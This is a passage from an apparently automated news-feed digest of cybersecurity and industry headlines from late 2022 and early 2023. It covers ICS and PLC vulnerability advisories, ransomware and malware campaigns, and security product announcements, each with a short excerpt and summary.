      2023-01-17 https://www.bbc.co.uk/news/world-latin-america-64299892?at_medium=RSS&at_campaign=KARANGA
      Thirty-nine people are indicted for their alleged involvement in the violence on 8 January. "

      Autosummary: "


      Nick Cave says ChatGPT's AI attempt to write Nick Cave lyrics "sucks"

      industry
      2023-01-17 https://www.bbc.co.uk/news/entertainment-arts-64302944?at_medium=RSS&at_campaign=KARANGA
      The musician responds after a popular chatbot produces lyrics "in the style of Nick Cave". "

      Autosummary: "


      CISA Warns for Flaws Affecting Industrial Control Systems from Major Manufacturers

      industry
      2023-01-16 https://thehackernews.com/2023/01/cisa-warns-for-flaws-affecting.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released several Industrial Control Systems (ICS) advisories warning of critical security flaws affecting products from Sewio, InHand Networks, Sauter Controls, and Siemens. The most severe of the flaws relate to Sewio's RTLS Studio, which could be exploited by an attacker to "obtain unauthorized access to the server, alter "

      Autosummary: "


      Industrial espionage: How China sneaks out America's technology secrets

      industry
      2023-01-16 https://www.bbc.co.uk/news/world-asia-china-64206950?at_medium=RSS&at_campaign=KARANGA
      The true extent of commercial spying is unknown but experts say it is "pervasive". "

      Autosummary: "


      Brazil riots: Brasília's ex-security chief arrested on return to city

      latam government industry
      2023-01-14 https://www.bbc.co.uk/news/world-latin-america-64275368?at_medium=RSS&at_campaign=KARANGA
      Anderson Torres is accused of colluding in the storming of Brazil's congress on 8 January. "

      Autosummary: "


      Brazil Supreme Court includes Jair Bolsonaro in riot probe

      latam industry
      2023-01-14 https://www.bbc.co.uk/news/world-latin-america-64271922?at_medium=RSS&at_campaign=KARANGA
      For the first time the ex-president is put among those potentially responsible for the riots. "

      Autosummary: "


      Critical vulnerabilities in Siemens PLC devices could allow bypass of protected boot features (CVE-2022-38773)

      industry
      2023-01-12 https://www.helpnetsecurity.com/2023/01/12/cve-2022-38773/

      Red Balloon Security disclosed multiple, critical architectural vulnerabilities in the Siemens SIMATIC and SIPLUS S7-1500 Series PLC that allow for bypass of all protected boot features. These vulnerabilities affect over 120 different models of the Siemens S7-1500 CPU product family. The vulnerable root-of-trust (RoT) implementation relies on a secure cryptographic processor. If the shared cryptographic material is captured, adversaries may use the secure cryptographic processor as an oracle to encrypt and decrypt tampered firmware. Red Balloon … More

      The post Critical vulnerabilities in Siemens PLC devices could allow bypass of protected boot features (CVE-2022-38773) appeared first on Help Net Security.

      "

      Autosummary: “While these vulnerabilities technically require physical access to exploit, it is possible for sophisticated attackers to ‘chain,’ or combine, these vulnerabilities with other remote access vulnerabilities on the same network to install malicious firmware without the need for in-person contact.” "


      Over 100 Siemens PLC Models Found Vulnerable to Firmware Takeover

      industry
      2023-01-12 https://thehackernews.com/2023/01/over-100-siemens-plc-models-found.html
      Security researchers have disclosed multiple architectural vulnerabilities in Siemens SIMATIC and SIPLUS S7-1500 programmable logic controllers (PLCs) that could be exploited by a malicious actor to stealthily install firmware on affected devices and take control of them. Discovered by Red Balloon Security, the issues are tracked as CVE-2022-38773 (CVSS score: 4.6), with the low severity "

      Autosummary: "


      Waterfall Security Solutions partners with Yokogawa to improve industrial security

      industry
      2023-01-11 https://www.helpnetsecurity.com/2023/01/11/waterfall-security-solutions-yokogawa/

      Waterfall Security Solutions announced a collaboration agreement with Yokogawa, a provider of industrial automation and test and measurement solutions. This new collaboration will make Waterfall’s Unidirectional Gateway cybersecurity products and technologies available to Yokogawa’s customers globally. In a world where cyber threats to industrial operations continue to become more powerful and more pervasive, making unidirectional protections available more widely will dramatically improve industrial security programs and preparedness. “Operational and technical reliability is a key focus … More

      The post Waterfall Security Solutions partners with Yokogawa to improve industrial security appeared first on Help Net Security.

      "

      Autosummary: Strong unidirectional security also enables and simplifies Yokogawa’s customers’ compliance with industrial cybersecurity best practices world-wide, including IEC 62443, France’s ANSSI, NERC CIP, the IIoT Security Framework, CENELEC TS 50701, and many more. "


      Gootkit Loader campaign targets Australian Healthcare Industry

      industry
      2023-01-11 https://securityaffairs.com/140655/malware/gootkit-loader-targets-australia.html

      Threat actors are targeting organizations in the Australian healthcare sector with the Gootkit malware loader. Trend Micro researchers warn that Gootkit Loader is actively targeting the Australian healthcare industry. The experts analyzed a series of attacks and discovered that Gootkit leveraged SEO poisoning for its initial access and abused legitimate tools like VLC Media Player. […]

      The post Gootkit Loader campaign targets Australian Healthcare Industry appeared first on Security Affairs.

      "

      Autosummary: “In addition to the continued targeting of the legal sector with the word “agreement”, we also found that the current operation has also clearly sharpened its targeting capability by including the words “hospital”, “health”, “medical”, and names of Australian cities.” "


      Digital forensics incident readiness

      industry
      2023-01-06 https://www.helpnetsecurity.com/2023/01/06/digital-forensics-incident-readiness-video/

      Digital forensics is used to find, examine and analyze digital evidence that can serve in criminal investigations, but also in incident response, investigations of data breaches, to unearth insider threats, etc. Colm Gallagher, Forensics Director, CommSec Communications & Security, talks about the factors that make digital forensics more difficult for law enforcement and industry, and offers advice and lays out practical measures that can increase forensic readiness for all. This video was recorded at IRISSCON … More

      The post Digital forensics incident readiness appeared first on Help Net Security.

      "

      Autosummary: "


      Microsoft Reveals Tactics Used by 4 Ransomware Families Targeting macOS

      exploits ransomware industry
      2023-01-06 https://thehackernews.com/2023/01/microsoft-reveals-tactics-used-by-4.html
      Microsoft has shed light on four different ransomware families – KeRanger, FileCoder, MacRansom, and EvilQuest – that are known to impact Apple macOS systems. "While these malware families are old, they exemplify the range of capabilities and malicious behavior possible on the platform," the tech giant's Security Threat Intelligence team said in a Thursday report. The initial vector for these "

      Autosummary: EvilQuest, which was first exposed in July 2020, further goes beyond typical ransomware to incorporate other trojan-like features, such as keylogging, compromising Mach-O files by injecting arbitrary code, and disabling security software. "


      Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub

      industry
      2023-01-06 https://thehackernews.com/2023/01/hackers-using-captcha-bypass-tactics-in.html
      A South Africa-based threat actor known as Automated Libra has been observed employing CAPTCHA bypass techniques to create GitHub accounts in a programmatic fashion as part of a freejacking campaign dubbed PURPLEURCHIN. The group "primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their crypto mining operations," Palo Alto Networks Unit 42 "

      Autosummary: Now according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, totally setting up over 130,000 bogus accounts across Heroku, Togglebox, and GitHub. "


      The Evolving Tactics of Vidar Stealer: From Phishing Emails to Social Media

      financial industry
      2023-01-05 https://thehackernews.com/2023/01/the-evolving-tactics-of-vidar-stealer.html
      The notorious information-stealer known as Vidar is continuing to leverage popular social media services such as TikTok, Telegram, Steam, and Mastodon as an intermediate command-and-control (C2) server. "When a user creates an account on an online platform, a unique account page that can be accessed by anyone is generated," AhnLab Security Emergency Response Center (ASEC) disclosed in a "

      Autosummary: "After information collection is complete, the extorted information is compressed into a ZIP file, encoded in Base64, and transmitted to the C2 server," ASEC researchers said. "


      The cybersecurity industry will undergo significant changes in 2023

      industry ciber
      2023-01-03 https://www.helpnetsecurity.com/2023/01/03/cybersecurity-industry-2023/

      The cybersecurity industry will undergo some significant changes in 2023. As more systems get connected, we can expect to see more outages. We probably won’t see a “digital Pearl Harbor,” but we will see more breaches, impact, and fear. How will this reshape the cybersecurity industry in the year ahead? Consolidation across the infosec industry: Since the infosec sector is “hot,” investment has poured into it as everyone tries to get in on the action. … More

      The post The cybersecurity industry will undergo significant changes in 2023 appeared first on Help Net Security.

      "

      Autosummary: For example, we had some valuable intelligence for an entire sector, went to the organization responsible for sharing info, and offered to provide it for free (literally write it an email, and they can share it). Tied to this, as budgets shrink, crazy salaries will no longer be paid, which is probably going to mean people think certs are a way to return to the crazy salary, and we end up with this vicious cycle. "


      MediaTek introduces Genio 700 for industrial and smart home products

      industry
      2023-01-03 https://www.helpnetsecurity.com/2023/01/03/mediatek-genio-700/

      MediaTek announced the latest chipset in the Genio platform for IoT devices, the octa-core Genio 700 designed for smart home, smart retail, and industrial IoT products. With a focus on power efficiency, the MediaTek Genio 700 is a N6 (6nm) IoT chipset that boasts two ARM A78 cores running at 2.2GHz and six ARM A55 cores at 2.0GHz while providing 4.0 TOPs AI accelerator. It comes with support for FHD60+4K60 display, as well as an … More

      The post MediaTek introduces Genio 700 for industrial and smart home products appeared first on Help Net Security.

      "

      Autosummary: "


      German industrial giant ThyssenKrupp targeted in a new cyberattack

      industry ciber
      2022-12-21 https://securityaffairs.co/wordpress/139870/hacking/thyssenkrupp-targeted-cyberattack.html

      German multinational industrial engineering and steel production company ThyssenKrupp AG was the target of a cyberattack. German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services division and corporate headquarters were hit by a cyberattack. At this time the company has yet to disclose the type of attack that hit […]

      The post German industrial giant ThyssenKrupp targeted in a new cyberattack appeared first on Security Affairs.

      "

      Autosummary: “At the present time, no damage has been done, nor are there any indications that data has been stolen or modified.” This isn’t the first attack suffered by the company; in 2012, the company was targeted by another cyber attack that was classified as “heavy” and of “exceptional quality.” "


      Colombian energy supplier EPM hit by BlackCat ransomware attack

      exploits latam ransomware industry
      2022-12-16 https://www.bleepingcomputer.com/news/security/colombian-energy-supplier-epm-hit-by-blackcat-ransomware-attack/
      Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company's operations and taking down online services. [...] "

      Autosummary: BlackCat ransomware behind the attack: BleepingComputer has since learned that the BlackCat ransomware operation, aka ALPHV, was behind the attacks, claiming to have stolen corporate data during the attacks. "


      Product showcase: Searchable encryption in Elasticsearch and OpenSearch with IronCore Labs

      industry
      2022-12-15 https://www.helpnetsecurity.com/2022/12/15/product-showcase-searchable-encryption-ironcore-labs/

      When it comes to sensitive data, search services are the ultimate treasure trove for hackers. Why slowly sift through information when a search service has indexed it all for you? Mistakes are inevitable and cloud misconfigurations are the number one cause of data breaches. The number two cause is when insider credentials are stolen. In either case, having your sensitive data encrypted can provide the defense-in-depth you need to prevent a mistake from becoming a … More

      The post Product showcase: Searchable encryption in Elasticsearch and OpenSearch with IronCore Labs appeared first on Help Net Security.

      "

      Autosummary: Quick look: What you need to know about Cloaked Search. Cloaked Search is a transparent proxy that encrypts data before it goes to Elasticsearch or OpenSearch while still allowing you to search that data; no plugins required. Choose which indices and fields to encrypt while the rest pass through normally, so you can start with your most sensitive data and expand over time. Perfect as a PET (privacy enhancing technology) for safeguarding personal information and complying with global privacy laws and data sovereignty concerns. Protects against breaches, unauthorized insider access, injection attacks, and cloud misconfigurations. How Cloaked Search works: Cloaked Search uses encryption-in-use techniques to allow searching over encrypted data without decrypting it. Supported search functionality: All of the advanced search functionality you rely on remains available to you over the Cloaked Search encrypted data, including field matching, phonetic matching, exact phrase matching, boolean queries, subdocument searches, autocompletion, wildcard searches, field boosting, and more. "


      Axiomatics Orchestrated Authorization enhancements centralize authorization strategy

      industry
      2022-12-12 https://www.helpnetsecurity.com/2022/12/12/axiomatics-orchestrated-authorization-strategy/

      Axiomatics has introduced the next evolution of its Orchestrated Authorization strategy. Through new capabilities and enhancements to the authorization solution, Axiomatics now offers the adaptable and scalable implementation of fine-grained access control (FGAC). This enables enterprises to centralize their authorization strategy while decentralizing policy modeling, testing, deployment, and analysis. “With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security … More

      The post Axiomatics Orchestrated Authorization enhancements centralize authorization strategy appeared first on Help Net Security.

      "

      Autosummary: “With increased adoption of zero trust, policies related to access control and risk can no longer be confined to identity and access management (IAM) or security teams alone, but require support from the broader enterprise, including both development and the business,” said Mark Cassetta, chief product officer for Axiomatics. "


      MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics

      industry
      2022-12-09 https://thehackernews.com/2022/12/muddywater-hackers-target-asian-and.html
      The Iran-linked MuddyWater threat actor has been observed targeting several countries in the Middle East as well as Central and West Asia as part of a new spear-phishing activity. "The campaign has been observed targeting Armenia, Azerbaijan, Egypt, Iraq, Israel, Jordan, Oman, Qatar, Tajikistan, and the United Arab Emirates," Deep Instinct researcher Simon Kenin said in a technical write-up. "

      Autosummary: "


      Diamond industry under attack – Week in security with Tony Anscombe

      industry
      2022-12-09 https://www.welivesecurity.com/videos/diamond-industry-attack-week-security-tony-anscombe/

      ESET researchers uncover a new wiper and its execution tool, both attributed to the Iran-aligned Agrius APT group

      The post Diamond industry under attack – Week in security with Tony Anscombe appeared first on WeLiveSecurity

      "

      Autosummary: "


      How IoT is changing the threat landscape for businesses

      industry
      2022-12-08 https://www.helpnetsecurity.com/2022/12/08/iot-threat-landscape-businesses-video/

      Where IoT-enabled devices connect to wider networks, their potential functionalities are immense, with countless applications across various industries, including production and manufacturing, healthcare, finance, and energy. In this Help Net Security video, Paul Keely, Chief Cloud Officer at Open Systems, talks about how organizations that employ IoT technology have improved their business efficiency. Still, all this data introduces a new challenge – security. While IoT presents organizations with new ways to advance and optimize, the … More

      The post How IoT is changing the threat landscape for businesses appeared first on Help Net Security.

      "

      Autosummary: "


      Iranian Hackers Strike Diamond Industry with Data-Wiping Malware in Supply-Chain Attack

      exploits industry
      2022-12-08 https://thehackernews.com/2022/12/iranian-hackers-strike-diamond-industry.html
      An Iranian advanced persistent threat (APT) actor known as Agrius has been attributed as behind a set of data wiper attacks aimed at diamond industries in South Africa, Israel, and Hong Kong. The wiper, codenamed Fantasy by ESET, is believed to have been delivered via a supply chain attack targeting an Israeli software suite developer as part of a campaign that began in February 2022. Victims "

      Autosummary: Agrius, the Iran-aligned group behind the intrusions, has been active since at least December 2020 and leverages known security flaws in internet-facing applications to drop web shells that are, in turn, used to facilitate reconnaissance, lateral movement, and the delivery of final-stage payloads. "


      Palo Alto Networks Medical IoT Security protects connected medical devices

      industry
      2022-12-07 https://www.helpnetsecurity.com/2022/12/07/palo-alto-networks-medical-iot-security/

      Palo Alto Networks has released Medical IoT Security — the zero trust security solution for medical devices — enabling healthcare organizations to deploy and manage new connected technologies. Zero trust is a strategic approach to cybersecurity that secures an organization by eliminating implicit trust by continuously verifying every user and device. “The proliferation of connected medical devices in the healthcare industry brings a wealth of benefits, but these devices are often not well secured. For … More

      The post Palo Alto Networks Medical IoT Security protects connected medical devices appeared first on Help Net Security.

      "

      Autosummary: Easily understand medical device vulnerabilities, patch status and security settings, and then get recommendations to bring devices into compliance with rules and guidelines, such as the Health Insurance Portability Accountability Act (HIPAA), General Data Protection Regulation (GDPR), and similar laws and regulations. For example, according to Unit 42, an alarming 75% of smart infusion pumps examined on the networks of hospitals and healthcare organizations had known security gaps,” said Anand Oswal, senior vice president of products, network security at Palo Alto Networks. "


      New Go-based Zerobot Botnet Exploiting Dozen of IoT Vulnerabilities to Expand its Network

      exploits industry
      2022-12-07 https://thehackernews.com/2022/12/new-go-based-zerobot-botnet-exploiting.html
      A novel Go-based botnet called Zerobot has been observed in the wild proliferating by taking advantage of nearly two dozen security vulnerabilities in the internet of things (IoT) devices and other software. The botnet "contains several modules, including self-replication, attacks for different protocols, and self-propagation," Fortinet FortiGuard Labs researcher Cara Lin said. "It also "

      Autosummary: "


      Microsoft Alerts Cryptocurrency Industry of Targeted Cyberattacks

      industry ciber
      2022-12-07 https://thehackernews.com/2022/12/microsoft-alerts-cryptocurrency.html
      Cryptocurrency investment companies are the target of a developing threat cluster that uses Telegram groups to seek out potential victims. Microsoft's Security Threat Intelligence Center (MSTIC) is tracking the activity under the name DEV-0139, and builds upon a recent report from Volexity that attributed the same set of attacks to North Korea's Lazarus Group. "DEV-0139 joined Telegram groups "

      Autosummary: In recent years, Telegram has not only witnessed widespread adoption in the cryptocurrency industry, but also been co-opted by threat actors looking to discuss zero-day vulnerabilities, offer stolen data, and market their services through the popular messaging platform. "


      Iranian State Hackers Targeting Key Figures in Activism, Journalism, and Politics

      government industry
      2022-12-06 https://thehackernews.com/2022/12/iranian-state-hackers-targeting-key.html
      Hackers with ties to the Iranian government have been linked to an ongoing social engineering and credential phishing campaign directed against human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East. At least 20 individuals are believed to have been targeted, Human Rights Watch (HRW) said in a report published Monday, attributing the "

      Autosummary: "In a Middle East region rife with surveillance threats for activists, it's essential for digital security researchers to not only publish and promote findings, but also prioritize the protection of the region's embattled activists, journalists, and civil society leaders," Ghattas said. "


      Vehicle Identification Numbers reveal driver data via telematics

      industry
      2022-12-06 https://www.malwarebytes.com/blog/news/2022/12/vehicle-identification-numbers-reveal-driver-data-via-telematics

      Categories: News

      Tags: VIN

      Tags: vehicle identification number

      Tags: car

      Tags: telematics

      Tags: SiriusXM

      Tags: data

      We take a look at reports of vehicle identification numbers being used to potentially reveal customer data through telematics.


      The post Vehicle Identification Numbers reveal driver data via telematics appeared first on Malwarebytes Labs.

      "

      Autosummary: Earlier this year, we were able to remotely unlock, start, locate, flash, and honk any remotely connected Honda, Nissan, Infiniti, and Acura vehicles, completely unauthorized, knowing only the VIN number of the car. Worse, using the VIN in this way was enough to pull up the customer’s name, phone number, address, and car details. Can you imagine anyone doing this now, as opposed to using business addresses, PO boxes, or domain privacy services in the age of trolling, doxxing, and swatting? Here's how we found it, and how it works: pic.twitter.com/ul3A4sT47k — Sam Curry (@samwcyo) November 30, 2022. As with so many interesting system exploits, the weak spot is a service being made use of by many. "


      New BMC Supply Chain Vulnerabilities Affect Servers from Dozens of Manufacturers

      industry
      2022-12-05 https://thehackernews.com/2022/12/new-bmc-supply-chain-vulnerabilities.html
      Three different security flaws have been disclosed in American Megatrends (AMI) MegaRAC Baseboard Management Controller (BMC) software that could lead to remote code execution on vulnerable servers. "The impact of exploiting these vulnerabilities include remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking)," "

      Autosummary: "


      Biometrics are even less accurate than we thought

      industry
      2022-12-05 https://www.computerworld.com/article/3682149/biometrics-are-even-less-accurate-than-we-thought.html#tk.rss_security

      Biometrics is supposed to be one of the underpinnings of a modern authentication system. But many biometric implementations (whether that be fingerprint scans or face recognition) can be wildly inaccurate, and the only universally positive thing to say about them is they're better than nothing.

      Also — and this may prove critical — the fact that biometrics are falsely seen as being very accurate may be sufficient to dissuade some fraud attempts. 

      There are a variety of practical reasons biometrics don't work well in the real world, and a recent post by a cybersecurity specialist at KnowBe4, a security awareness training vendor, adds a new layer of complexity to the biometrics issue.


      "

      Autosummary: On top of that, many vendors, including Apple (iOS) and Google (Android), make marketing choices in their settings, where they choose how stringent or lenient the authentication is. There are a variety of practical reasons biometrics don't work well in the real world, and a recent post by a cybersecurity specialist at KnowBe4, a security awareness training vendor, adds a new layer of complexity to the biometrics issue. "So far, none of the submitted candidates come anywhere close," Grimes wrote, summarizing the NIST findings. In other words, if a thief wants to get around biometrics, all he or she has to do is fail once or twice and then deal with the easier-to-crack PIN. "


      DHS Cyber Safety Board to review Lapsus$ gang’s hacking tactics

      industry
      2022-12-02 https://www.bleepingcomputer.com/news/security/dhs-cyber-safety-board-to-review-lapsus-gang-s-hacking-tactics/
      The Department of Homeland Security (DHS) Cyber Safety Review Board will review attacks linked to an extortion group known as Lapsus$, which breached multiple high-profile companies in recent attacks. [...] "

      Autosummary: The Lapsus$ hacker group made the news earlier this year after hacking Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "


      CISA Warns of Multiple Critical Vulnerabilities Affecting Mitsubishi Electric PLCs

      industry
      2022-12-02 https://thehackernews.com/2022/12/cisa-warns-of-multiple-critical.html
      The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week released an Industrial Control Systems (ICS) advisory warning of multiple vulnerabilities in Mitsubishi Electric GX Works3 engineering software. "Successful exploitation of these vulnerabilities could allow unauthorized users to gain access to the MELSEC iQ-R/F/L series CPU modules and the MELSEC iQ-R series OPC UA server "

      Autosummary: "


      Top tips to save energy used by your electronic devices

      industry
      2022-12-01 https://www.welivesecurity.com/2022/12/01/top-tips-save-energy-electronic-devices/

      With the rapidly rising energy prices putting a strain on many households, what are some quick wins to help reduce the power consumption of your gadgets?

      The post Top tips to save energy used by your electronic devices appeared first on WeLiveSecurity

      "

      Autosummary: Use laptops, rather than desktop computers, as they use less energy, according to the US government. With inflation starting to hit home and bills on the rise across Europe, consumers in some countries are being asked by their governments to try and cut back on energy use where possible amid fears of power blackouts. Here are some ideas: If you’re on the hunt for new gadgets, look for energy efficient kit by checking for Energy Star accreditation and/or a good rating on the EU’s energy labelling scheme. "


      IoT device origin matters more than ever

      industry
      2022-11-30 https://www.helpnetsecurity.com/2022/11/30/iot-device-origin/

      Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington. Not only did ministers criticize the state-owned companies as national security and cybersecurity threats, but they also brought into question their human rights record. This story is not an outlier. From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy … More

      The post IoT device origin matters more than ever appeared first on Help Net Security.

      "

      Autosummary: Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington. Powered by smaller, cheaper, and more efficient components, most of this growth comes from Chinese companies. From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy or regulatory standards – largely from the Asian superpower – have flooded the market over the past decade. "


      How the dynamics of phishing attacks are changing

      financial industry
      2022-11-28 https://www.helpnetsecurity.com/2022/11/28/phishing-attacks-impact-video/

      In this Help Net Security video, Alex Paquette, COO at Ironscales, discusses the impact in terms of the time and energy required to defend against the never-ending and ever-evolving onslaught of phishing attacks. A recent study conducted by Osterman Research found that IT and security teams spend one-third of their time handling phishing threats every week. 70% of organizations spend 16-60 minutes dealing with a single phishing email message. Almost half of the respondents state … More

      The post How the dynamics of phishing attacks are changing appeared first on Help Net Security.

      "

      Autosummary: "


      Over a Dozen New BMC Firmware Flaws Expose OT and IoT Devices to Remote Attacks

      industry
      2022-11-28 https://thehackernews.com/2022/11/over-dozen-new-bmc-firmware-flaws.html
      Over a dozen security flaws have been discovered in baseboard management controller (BMC) firmware from Lanner that could expose operational technology (OT) and internet of things (IoT) networks to remote attacks. BMC refers to a specialized service processor, a system-on-chip (SoC), that's found in server motherboards and is used for remote monitoring and management of a host system, including "

      Autosummary: "


      OneTrust partners with ECI to help companies evaluate their ethics and compliance programs

      industry
      2022-11-23 https://www.helpnetsecurity.com/2022/11/23/onetrust-eci/

      OneTrust is partnering with the Ethics & Compliance Initiative (ECI), the global non-profit organization that empowers organizations to build and sustain cultures of integrity. The partnership enables OneTrust to offer its customers the ECI High-Quality Ethics & Compliance Program (HQP) Assessment tool, which helps organizations evaluate their ethics and compliance programs and determine their level of maturity. ECI has led the effort for organizations to identify and adopt high-quality ethics and compliance programs for many … More

      The post OneTrust partners with ECI to help companies evaluate their ethics and compliance programs appeared first on Help Net Security.

      "

      Autosummary: The OneTrust Ethics and Compliance Cloud brings together ethics program management, speak-up culture assurance, and third-party due diligence to unify people, processes, and technology across ethics, compliance, HR, and legal teams. "


      Experts claim that iPhone’s analytics data is not anonymous

      industry
      2022-11-23 https://securityaffairs.co/wordpress/138884/digital-id/iphone-found-collecting-personal-data.html

      Researchers discovered that analytics data associated with iPhone include Directory Services Identifier (DSID) that could allow identifying users. Researchers at software company Mysk discovered that analytics data collected by iPhone include the Directory Services Identifier (DSID), which could allow identifying users. Apple collects both DSID and Apple ID, which means that it can use the […]

      The post Experts claim that iPhone’s analytics data is not anonymous appeared first on Security Affairs.

      "

      Autosummary: "


      Hackers breach energy orgs via bugs in discontinued web server

      exploits industry
      2022-11-22 https://www.bleepingcomputer.com/news/security/hackers-breach-energy-orgs-via-bugs-in-discontinued-web-server/
      Microsoft said today that security vulnerabilities found to impact a web server discontinued since 2005 have been used to target and compromise organizations in the energy sector. [...] "

      Autosummary: "To achieve this, the group likely compromised and co-opted internet-facing DVR/IP camera devices for command and control (C2) of Shadowpad malware infections, as well as use of the open source tool FastReverseProxy." Attacks linked to Boa web server flaws: While Recorded Future didn't expand on the attack vector, Microsoft said today that the attackers exploited a vulnerable component in the Boa web server, a software solution discontinued since 2015 that's still being used by IoT devices (from routers to cameras). "


      Resecurity collaborates with CyberKSA to combat threats targeting the industry

      industry
      2022-11-17 https://www.helpnetsecurity.com/2022/11/17/resecurity-cyberksa/

      Resecurity has partnered with Saudi Cybersecurity Company (CyberKSA), a cybersecurity provider in the Kingdom of Saudi Arabia (KSA). The partnership will allow CyberKSA to offer award-winning cyber threat intelligence (CTI), dark web monitoring (DWM), digital risk management (DRM), fraud prevention (FP) and identity protection (IDP) products to consumer and enterprise organizations. The comprehensive portfolio of solutions will accelerate specialized offerings for MSSPs/ISPs and large enterprise customers looking to streamline their cybersecurity operations across their environment. … More

      The post Resecurity collaborates with CyberKSA to combat threats targeting the industry appeared first on Help Net Security.

      "

      Autosummary: To reduce fragmentation, Resecurity is following a unified platform-as-a-service (PaaS) model, combining critical components of security service edge (SSE) and a scalable data lake containing a massive volume of actionable cyber threat intelligence data and associated telemetry useful for implementation into security information and event management (SIEM), security operations center (SOC), cyber fusion center (CFS) and third-party systems and applications. "


      Micron Authenta enhancements boost end-to-end cloud services across the IoT ecosystem

      industry
      2022-11-16 https://www.helpnetsecurity.com/2022/11/16/micron-technology-authenta/

      Micron Technology expands portfolio for its silicon root-of-trust solution, Authenta, making its cloud-based internet of things (IoT) security offerings more widely accessible. Micron is enabling Authenta in a family of Serial Peripheral Interface NOR (SPI-NOR) devices with increased density and packaging options and unveiling the Authenta Cloud Platform to help enterprises deploy and scale trust-based security at the intelligent edge. The company is also collaborating with security solutions expert Swissbit AG and new customer SanCloud … More

      The post Micron Authenta enhancements boost end-to-end cloud services across the IoT ecosystem appeared first on Help Net Security.

      "

      Autosummary: Swissbit, a leading European security and memory solution provider for IoT applications, and Micron are also now collaborating to embed Authenta technology in Swissbit’s security and storage solutions for IoT and industrial markets — bringing Micron’s unique silicon root-of-trust security features to Swissbit’s broad base of customers across areas such as industrial automation, automotive, IoT, medical, networking and communication. "


      Microsoft Supply Chain Platform helps organizations fix logistics and inventory problems

      industry
      2022-11-16 https://www.helpnetsecurity.com/2022/11/16/microsoft-supply-chain-platform-helps-organizations-fix-logistics-and-inventory-problems/

      Microsoft announced the Microsoft Supply Chain Platform, which helps organizations maximize their supply chain data estate investment with an open approach, bringing the best of Microsoft AI, collaboration, low-code, security and SaaS applications in a composable platform. The company also announced the preview of Microsoft Supply Chain Center, a ready-made command center for supply chain visibility and transformation and part of the Microsoft Supply Chain Platform. Supply Chain Center is designed to work natively with … More

      The post Microsoft Supply Chain Platform helps organizations fix logistics and inventory problems appeared first on Help Net Security.

      "

      Autosummary: In addition, to help customers find the best solution for their supply chain needs, Microsoft will continue to work with solution providers such as Blue Yonder, Cosmo Tech, Experlogix, Flintfox, inVia Robotics, K3, O9 Solutions, SAS, Sonata, To-Increase Software and many more. Accelerating business agility with the Microsoft Supply Chain Center: At the core of the Supply Chain Platform is the Microsoft Supply Chain Center, now available in preview, which provides a command center experience for practitioners to harmonize data from across existing infrastructure supply chain systems, such as data from Dynamics 365, and other ERP providers, including SAP and Oracle, along with standalone supply chain systems. "


      Alif Semiconductor partners with Telit to develop and deploy IoT edge devices

      industry
      2022-11-16 https://www.helpnetsecurity.com/2022/11/16/alif-semiconductor-telit/

      Alif has collaborated with Telit to deliver developer kits that provide cloud-connected hardware and software reference designs for a wide variety of distributed and IoT edge applications. The kits focus on connected AI/ML-enhanced vision, voice, vibration, and sensor applications such as AI cameras, smart home, city infrastructure, biometric access control, and wearables. The kits leverage the Alif Ensemble family of microcontrollers (MCUs) and fusion processors. Ensemble devices utilize innovative aiPM power management technology that feature … More

      The post Alif Semiconductor partners with Telit to develop and deploy IoT edge devices appeared first on Help Net Security.

      "

      Autosummary: "


      Electronics repair technicians snoop on your data

      industry
      2022-11-16 https://www.helpnetsecurity.com/2022/11/16/computer-smartphone-repair-data-privacy/

      When your computer or smartphone needs repairing, can you trust repair technicians not to access or steal your personal data? According to the results of recent research by scientists at the University of Guelph, Canada, you shouldn’t. Granted, they tested only 16 repair service providers with rigged devices, but in six cases technicians snooped on customers’ data and in two they copied the data to external devices. Oh, and most of them tried to cover … More

      The post Electronics repair technicians snoop on your data appeared first on Help Net Security.

      "

      Autosummary: First they asked 18 repair service providers – national (big-box stores), regional (stores of a larger chain), local (mom-and-pop shops), and device manufacturers – whether they have a privacy policy or have set up controls to protect device owners’ personal data from snooping technicians, and found that most have not. "


      Phosphorus and Redapt join forces to deliver xIoT security to US enterprises

      industry
      2022-11-15 https://www.helpnetsecurity.com/2022/11/15/phosphorus-redapt/

      The new Phosphorus and Redapt partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “Enterprises face a growing risk of cyber attacks because of vulnerable IoT and OT endpoints which traditional security companies can’t protect,” said Kal Gajera, Director of North America Channels at Phosphorus. “These attacks can lead to a full compromise … More

      The post Phosphorus and Redapt join forces to deliver xIoT security to US enterprises appeared first on Help Net Security.

      "

      Autosummary: "


      Skyworks collaborates with MediaTek to offer end-to-end 5G automotive solutions

      industry
      2022-11-15 https://www.helpnetsecurity.com/2022/11/15/skyworks-solutions-mediatek/

      Skyworks announced that the company has engaged with MediaTek to offer a complete modem-to-antenna automotive-grade 5G solution. This 5G New Radio Sky5A RF front-end solution will accelerate the deployment of this protocol across an array of automotive OEM and consumer service offerings. “The rollout of 5G is reshaping the automotive market with a variety of safety and entertainment telematics applications to improve the driving experience,” said Martin Lin, deputy general manager of the Wireless Communications … More

      The post Skyworks collaborates with MediaTek to offer end-to-end 5G automotive solutions appeared first on Help Net Security.

      "

      Autosummary: "


      Researchers Reported Critical SQLi and Access Flaws in Zendesk Analytics Service

      industry
      2022-11-15 https://thehackernews.com/2022/11/researchers-reported-critical-sqli-and.html
